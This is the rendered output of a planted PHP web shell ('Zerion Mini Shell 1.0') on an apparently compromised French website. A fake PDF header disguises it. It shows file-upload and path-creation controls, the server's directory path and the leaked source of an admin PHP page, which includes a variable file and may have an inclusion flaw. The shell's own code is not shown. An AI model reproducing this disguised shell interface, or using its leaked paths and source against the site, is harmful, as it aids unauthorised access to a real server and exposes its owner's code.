%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/alliance/domains/sedl.alnetis.fr/public_html/test/
Upload File :
Create Path :
Current File : /home/alliance/domains/sedl.alnetis.fr/public_html/test/a-index.php

<?php
include_once("inc/config.php");
include_once("inc/functions.php");
include_once("inc/session.php");
include_once("inc/init.php");

verif_co();

//affichage du html
include("theme/html.php");
//affichage des metas
include("theme/meta.php");
echo "\n<title>Administration - ".$info_titresite."</title>\n";
//affichage du header
if(estadmin()){
	include("theme/header_admin.php");
}
else if (estco()) {
	include("theme/header_redacteur.php");
}
else {
	include("theme/header_noconnect.php");
}
?>

<div class="text_admin">
<?php
if($err) {
	echo "<p class=\"erreurbloc\">".$erreur."</p>";
}
if($yes) {
	echo "<p class=\"infobloc\">Connexion réussie</p>";
	include($page);
}


if(estadmin()){
	include("templates/admin/indexadmin.php");
}
else {
	include("templates/admin/indexredacteur.php");
}

?>
</div>

<?

//affichage du footer
include("theme/footer.php");

?>

Zerion Mini Shell 1.0